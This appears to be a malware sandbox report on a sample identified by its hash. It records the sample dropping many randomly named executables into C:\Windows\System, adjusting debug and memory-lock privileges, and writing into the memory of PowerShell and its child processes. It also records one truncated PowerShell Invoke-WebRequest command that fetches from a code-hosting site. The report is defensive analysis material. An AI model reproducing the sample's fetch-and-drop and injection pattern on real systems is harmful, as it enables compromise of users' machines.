File created C:\Windows\System\kiAnSGS.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\bZbGTMV.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\YPiGrTe.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\IeVKMHi.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\injAZdu.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\FGeiRYm.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\PlXZrkn.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\vcjYlTu.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\QvQzhss.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\Bftvhko.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\kzhZMUi.exe
PID 2128 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\kzhZMUi.exe
PID 2128 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\kzhZMUi.exe
PID 2128 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\oKaxLgI.exe
PID 2128 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\oKaxLgI.exe
PID 2128 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\oKaxLgI.exe
PID 2128 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\yWdUHzx.exe
PID 2128 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\yWdUHzx.exe
PID 2128 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\yWdUHzx.exe
PID 2128 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\COzodZx.exe
PID 2128 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\COzodZx.exe
PID 2128 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\COzodZx.exe
PID 2128 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\coXMrac.exe
PID 2128 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\coXMrac.exe
PID 2128 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\coXMrac.exe
PID 2128 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\wHmaeeg.exe
PID 2128 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\wHmaeeg.exe
PID 2128 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\wHmaeeg.exe
PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\BDQxwKY.exe
PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\BDQxwKY.exe
PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\BDQxwKY.exe
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\oVQGSwE.exe
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\oVQGSwE.exe
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\oVQGSwE.exe
PID 2128 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\gSSGChD.exe
PID 2128 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\gSSGChD.exe
PID 2128 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\gSSGChD.exe
PID 2128 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\IXSYrsr.exe
PID 2128 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\IXSYrsr.exe
PID 2128 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\IXSYrsr.exe
PID 2128 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\bxKbcrq.exe
PID 2128 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\bxKbcrq.exe
PID 2128 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\bxKbcrq.exe
PID 2128 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\vfYPDbk.exe
PID 2128 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\vfYPDbk.exe
PID 2128 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\vfYPDbk.exe
PID 2128 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\utdQnkO.exe
PID 2128 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\utdQnkO.exe
PID 2128 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\utdQnkO.exe
PID 2128 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\LUmkYiW.exe
PID 2128 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\LUmkYiW.exe
PID 2128 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\LUmkYiW.exe
PID 2128 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\YQVGiyM.exe
PID 2128 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\YQVGiyM.exe
PID 2128 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\YQVGiyM.exe
PID 2128 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\VpgLoIr.exe
PID 2128 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\VpgLoIr.exe
PID 2128 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\VpgLoIr.exe
PID 2128 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\APFUMiO.exe
PID 2128 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\APFUMiO.exe
PID 2128 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\APFUMiO.exe
PID 2128 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\cCCbAEQ.exe
PID 2128 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\cCCbAEQ.exe
PID 2128 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\cCCbAEQ.exe
PID 2128 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\OWucenH.exe
PID 2128 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\OWucenH.exe
PID 2128 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\OWucenH.exe
PID 2128 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\xPSzUjD.exe
PID 2128 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\xPSzUjD.exe
PID 2128 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\xPSzUjD.exe
PID 2128 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\roemEhd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe

"C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\kzhZMUi.exe

C:\Windows\System\kzhZMUi.exe

C:\Windows\System\oKaxLgI.exe

C:\Windows\System\oKaxLgI.exe

C:\Windows\System\yWdUHzx.exe

C:\Windows\System\yWdUHzx.exe

C:\Windows\System\COzodZx.exe

C:\Windows\System\COzodZx.exe

C:\Windows\System\coXMrac.exe

C:\Windows\System\coXMrac.exe

C:\Windows\System\wHmaeeg.exe

C:\Windows\System\wHmaeeg.exe

C:\Windows\System\BDQxwKY.exe

C:\Windows\System\BDQxwKY.exe

C:\Windows\System\oVQGSwE.exe

C:\Windows\System\oVQGSwE.exe

C:\Windows\System\gSSGChD.exe

C:\Windows\System\gSSGChD.exe

C:\Windows\System\IXSYrsr.exe

C:\Windows\System\IXSYrsr.exe

C:\Windows\System\bxKbcrq.exe

C:\Windows\System\bxKbcrq.exe

C:\Windows\System\vfYPDbk.exe

C:\Windows\System\vfYPDbk.exe

C:\Windows\System\utdQnkO.exe

C:\Windows\System\utdQnkO.exe

C:\Windows\System\LUmkYiW.exe

C:\Windows\System\LUmkYiW.exe

C:\Windows\System\YQVGiyM.exe

C:\Windows\System\YQVGiyM.exe

C:\Windows\System\VpgLoIr.exe

C:\Windows\System\VpgLoIr.exe

C:\Windows\System\APFUMiO.exe

C:\Windows\System\APFUMiO.exe

C:\Windows\System\cCCbAEQ.exe

C:\Windows\System\cCCbAEQ.exe

C:\Windows\System\OWucenH.exe

C:\Windows\System\OWucenH.exe

C:\Windows\System\xPSzUjD.exe

C:\Windows\System\xPSzUjD.exe

C:\Windows\System\roemEhd.exe

C:\Windows\System\roemEhd.exe

C:\Windows\System\nzWUwMH.exe

C:\Windows\System\nzWUwMH.exe

C:\Windows\System\FXUdoJX.exe

C:\Windows\System\FXUdoJX.exe

C:\Windows\System\inNdZno.exe

C:\Windows\System\inNdZno.exe

C:\Windows\System\VhBoqED.exe

C:\Windows\System\VhBoqED.exe

C:\Windows\System\AQafrOB.exe

C:\Windows\System\AQafrOB.exe

C:\Windows\System\HVEQEQM.exe

C:\Windows\System\HVEQEQM.exe

C:\Windows\System\XPuNWUj.exe

C:\Windows\System\XPuNWUj.exe

C:\Windows\System\ODxgpXY.exe

C:\Windows\System\ODxgpXY.exe

C:\Windows\System\aThtiug.exe

C:\Windows\System\aThtiug.exe

C:\Windows\System\eNAvOsm.exe

C:\Windows\System\eNAvOsm.exe

C:\Windows\System\YnZlPYf.exe

C:\Windows\System\YnZlPYf.exe

C:\Windows\System\oZOBfpG.exe

C:\Windows\System\oZOBfpG.exe

C:\Windows\System\zjHaHPq.exe

C:\Windows\System\zjHaHPq.exe

C:\Windows\System\XaFZixs.exe

C:\Windows\System\XaFZixs.exe

C:\Windows\System\opGlllv.exe

C:\Windows\System\opGlllv.exe

C:\Windows\System\BTXkXZl.exe

C:\Windows\System\BTXkXZl.exe

C:\Windows\System\ftGFGCo.exe

C:\Windows\System\ftGFGCo.exe

C:\Windows\System\tTQkGKU.exe

C:\Windows\System\tTQkGKU.exe

C:\Windows\System\waGsucl.exe

C:\Windows\System\waGsucl.exe

C:\Windows\System\OobCgiA.exe

C:\Windows\System\OobCgiA.exe

C:\Windows\System\utsKDQN.exe

C:\Windows\System\utsKDQN.exe

C:\Windows\System\CcmavLq.exe

C:\Windows\System\CcmavLq.exe

C:\Windows\System\JPSfGxC.exe

C:\Windows\System\JPSfGxC.exe

C:\Windows\System\Mvemyqr.exe

C:\Windows\System\Mvemyqr.exe

C:\Windows\System\YvHDmZn.exe

C:\Windows\System\YvHDmZn.exe

C:\Windows\System\Furespf.exe

C:\Windows\System\Furespf.exe

C:\Windows\System\VGefVfv.exe

C:\Windows\System\VGefVfv.exe

C:\Windows\System\wwUwtAy.exe

C:\Windows\System\wwUwtAy.exe

C:\Windows\System\dgUzEvU.exe

C:\Windows\System\dgUzEvU.exe

C:\Windows\System\MIzDCqU.exe

C:\Windows\System\MIzDCqU.exe

C:\Windows\System\mBpBaqq.exe

C:\Windows\System\mBpBaqq.exe

C:\Windows\System\YRETEqb.exe

C:\Windows\System\YRETEqb.exe

C:\Windows\System\YIqNIJr.exe

C:\Windows\System\YIqNIJr.exe

C:\Windows\System\HhgmDRH.exe

C:\Windows\System\HhgmDRH.exe

C:\Windows\System\vqCCZDu.exe

C:\Windows\System\vqCCZDu.exe

C:\Windows\System\TyTXvbL.exe

C:\Windows\System\TyTXvbL.exe

C:\Windows\System\dsLNtFf.exe

C:\Windows\System\dsLNtFf.exe

C:\Windows\System\hBDKFQA.exe

C:\Windows\System\hBDKFQA.exe

C:\Windows\System\FWipFhv.exe

C:\Windows\System\FWipFhv.exe

C:\Windows\System\gOjOctH.exe

C:\Windows\System\gOjOctH.exe

C:\Windows\System\JxheREB.exe

C:\Windows\System\JxheREB.exe

C:\Windows\System\BmFfZVA.exe

C:\Windows\System\BmFfZVA.exe

C:\Windows\System\wPrKwcY.exe

C:\Windows\System\wPrKwcY.exe

C:\Windows\System\vaVVStn.exe

C:\Windows\System\vaVVStn.exe

C:\Windows\System\dfdrQaz.exe

C:\Windows\System\dfdrQaz.exe

C:\Windows\System\qCfTKXK.exe

C:\Windows\System\qCfTKXK.exe

C:\Windows\System\DCEfIZG.exe

C:\Windows\System\DCEfIZG.exe

C:\Windows\System\HQGIgTt.exe

C:\Windows\System\HQGIgTt.exe

C:\Windows\System\euOztVG.exe

C:\Windows\System\euOztVG.exe

C:\Windows\System\xRGfBtg.exe

C:\Windows\System\xRGfBtg.exe

C:\Windows\System\chTomSQ.exe

C:\Windows\System\chTomSQ.exe

C:\Windows\System\dGXndZH.exe

C:\Windows\System\dGXndZH.exe

C:\Windows\System\DjkKJEP.exe

C:\Windows\System\DjkKJEP.exe

C:\Windows\System\IZOAumd.exe

C:\Windows\System\IZOAumd.exe

C:\Windows\System\exuHrzz.exe

C:\Windows\System\exuHrzz.exe

C:\Windows\System\poFtWAE.exe

C:\Windows\System\poFtWAE.exe

C:\Windows\System\avHHzcm.exe

C:\Windows\System\avHHzcm.exe

C:\Windows\System\YBGZDyE.exe

C:\Windows\System\YBGZDyE.exe

C:\Windows\System\hMbwicY.exe

C:\Windows\System\hMbwicY.exe

C:\Windows\System\HmofijG.exe

C:\Windows\System\HmofijG.exe

C:\Windows\System\ybALXwt.exe

C:\Windows\System\ybALXwt.exe

C:\Windows\System\wYYQtzK.exe

C:\Windows\System\wYYQtzK.exe

C:\Windows\System\VhVRxGH.exe

C:\Windows\System\VhVRxGH.exe

C:\Windows\System\gLJDGjh.exe

C:\Windows\System\gLJDGjh.exe

C:\Windows\System\HXOGqML.exe

C:\Windows\System\HXOGqML.exe

C:\Windows\System\nuPNeGS.exe

C:\Windows\System\nuPNeGS.exe

C:\Windows\System\qoZEnbg.exe

C:\Windows\System\qoZEnbg.exe

C:\Windows\System\cuPSqRX.exe

C:\Windows\System\cuPSqRX.exe

C:\Windows\System\UScQsAL.exe

C:\Windows\System\UScQsAL.exe

C:\Windows\System\UWcPdBt.exe

C:\Windows\System\UWcPdBt.exe

C:\Windows\System\oeBzjSJ.exe

C:\Windows\System\oeBzjSJ.exe

C:\Windows\System\YSHvPIH.exe

C:\Windows\System\YSHvPIH.exe

C:\Windows\System\LMbfKhb.exe

C:\Windows\System\LMbfKhb.exe

C:\Windows\System\MOJDLBA.exe

C:\Windows\System\MOJDLBA.exe

C:\Windows\System\aBVbmAs.exe

C:\Windows\System\aBVbmAs.exe

C:\Windows\System\DOiCnxS.exe

C:\Windows\System\DOiCnxS.exe

C:\Windows\System\abBWLul.exe

C:\Windows\System\abBWLul.exe

C:\Windows\System\gNaGjab.exe

C:\Windows\System\gNaGjab.exe

C:\Windows\System\BuAVOki.exe

C:\Windows\System\BuAVOki.exe

C:\Windows\System\unhMEFK.exe

C:\Windows\System\unhMEFK.exe

C:\Windows\System\dPEqCAA.exe

C:\Windows\System\dPEqCAA.exe

C:\Windows\System\IFVEemz.exe

C:\Windows\System\IFVEemz.exe

C:\Windows\System\WOPLJzE.exe

C:\Windows\System\WOPLJzE.exe

C:\Windows\System\tkvBLMd.exe

C:\Windows\System\tkvBLMd.exe

C:\Windows\System\IOycBOy.exe

C:\Windows\System\IOycBOy.exe

C:\Windows\System\rBjOKsr.exe

C:\Windows\System\rBjOKsr.exe

C:\Windows\System\SNjyKDl.exe

C:\Windows\System\SNjyKDl.exe

C:\Windows\System\UBAIgaR.exe

C:\Windows\System\UBAIgaR.exe

C:\Windows\System\GLjtIvT.exe

C:\Windows\System\GLjtIvT.exe

C:\Windows\System\OVOiqJd.exe

C:\Windows\System\OVOiqJd.exe

C:\Windows\System\UupvMFi.exe

C:\Windows\System\UupvMFi.exe

C:\Windows\System\BtALAxw.exe

C:\Windows\System\BtALAxw.exe

C:\Windows\System\nxsFmTT.exe

C:\Windows\System\nxsFmTT.exe

C:\Windows\System\TFcATpq.exe

C:\Windows\System\TFcATpq.exe

C:\Windows\System\PlhQljw.exe

C:\Windows\System\PlhQljw.exe

C:\Windows\System\gyocmWQ.exe

C:\Windows\System\gyocmWQ.exe

C:\Windows\System\QrLIoYh.exe

C:\Windows\System\QrLIoYh.exe

C:\Windows\System\gIthEDi.exe

C:\Windows\System\gIthEDi.exe

C:\Windows\System\gmFrdrN.exe

C:\Windows\System\gmFrdrN.exe

C:\Windows\System\VAoZPme.exe

C:\Windows\System\VAoZPme.exe

C:\Windows\System\pPVSved.exe

C:\Windows\System\pPVSved.exe

C:\Windows\System\HsHqEUL.exe

C:\Windows\System\HsHqEUL.exe

C:\Windows\System\MZLSWIR.exe

C:\Windows\System\MZLSWIR.exe

C:\Windows\System\IJaONFx.exe

C:\Windows\System\IJaONFx.exe

C:\Windows\System\ViyOUUQ.exe

C:\Windows\System\ViyOUUQ.exe

C:\Windows\System\zpvAnFJ.exe

C:\Windows\System\zpvAnFJ.exe

C:\Windows\System\ebHDAGO.exe

C:\Windows\System\ebHDAGO.exe

C:\Windows\System\jGSkfJp.exe

C:\Windows\System\jGSkfJp.exe

C:\Windows\System\uLFJKGl.exe

C:\Windows\System\uLFJKGl.exe

C:\Windows\System\ZEyOhIM.exe

C:\Windows\System\ZEyOhIM.exe

C:\Windows\System\kqXLSXW.exe

C:\Windows\System\kqXLSXW.exe

C:\Windows\System\EqwYJRj.exe

C:\Windows\System\EqwYJRj.exe

C:\Windows\System\FbMZuzc.exe

C:\Windows\System\FbMZuzc.exe

C:\Windows\System\aUOdFDj.exe

C:\Windows\System\aUOdFDj.exe

C:\Windows\System\YgSVvWm.exe

C:\Windows\System\YgSVvWm.exe

C:\Windows\System\HLGRgzc.exe

C:\Windows\System\HLGRgzc.exe

C:\Windows\System\hujYMZd.exe

C:\Windows\System\hujYMZd.exe

C:\Windows\System\sMnguqL.exe

C:\Windows\System\sMnguqL.exe

C:\Windows\System\ZYSEjCy.exe

C:\Windows\System\ZYSEjCy.exe

C:\Windows\System\eqcNTkh.exe

C:\Windows\System\eqcNTkh.exe

C:\Windows\System\bbiYFUG.exe

C:\Windows\System\bbiYFUG.exe

C:\Windows\System\qiidXhl.exe

C:\Windows\System\qiidXhl.exe

C:\Windows\System\IRKMFvA.exe

C:\Windows\System\IRKMFvA.exe

C:\Windows\System\MqtXjMx.exe

C:\Windows\System\MqtXjMx.exe

C:\Windows\System\KsmrMMb.exe

C:\Windows\System\KsmrMMb.exe

C:\Windows\System\YlHfcuH.exe

C:\Windows\System\YlHfcuH.exe

C:\Windows\System\qblFZjE.exe

C:\Windows\System\qblFZjE.exe

C:\Windows\System\QVszJVb.exe

C:\Windows\System\QVszJVb.exe

C:\Windows\System\XLslTGH.exe

C:\Windows\System\XLslTGH.exe

C:\Windows\System\vWTSzpg.exe

C:\Windows\System\vWTSzpg.exe

C:\Windows\System\xbmvyTL.exe

C:\Windows\System\xbmvyTL.exe

C:\Windows\System\EkaTauS.exe

C:\Windows\System\EkaTauS.exe

C:\Windows\System\PHVASPW.exe

C:\Windows\System\PHVASPW.exe

C:\Windows\System\JnECsnt.exe

C:\Windows\System\JnECsnt.exe

C:\Windows\System\exlScKL.exe

C:\Windows\System\exlScKL.exe

C:\Windows\System\xhsYaNw.exe

C:\Windows\System\xhsYaNw.exe

C:\Windows\System\aViaoCy.exe

C:\Windows\System\aViaoCy.exe

C:\Windows\System\HgrFiVC.exe

C:\Windows\System\HgrFiVC.exe

C:\Windows\System\LzlMfEf.exe

C:\Windows\System\LzlMfEf.exe

C:\Windows\System\jUMShsZ.exe

C:\Windows\System\jUMShsZ.exe

C:\Windows\System\wKPxrFi.exe

C:\Windows\System\wKPxrFi.exe

C:\Windows\System\VSWTQyd.exe

C:\Windows\System\VSWTQyd.exe

C:\Windows\System\IloeSec.exe

C:\Windows\System\IloeSec.exe

C:\Windows\System\vffrydW.exe

C:\Windows\System\vffrydW.exe

C:\Windows\System\pmDZNKZ.exe

C:\Windows\System\pmDZNKZ.exe

C:\Windows\System\UAoiOpn.exe

C:\Windows\System\UAoiOpn.exe

C:\Windows\System\zUcNkKd.exe

C:\Windows\System\zUcNkKd.exe

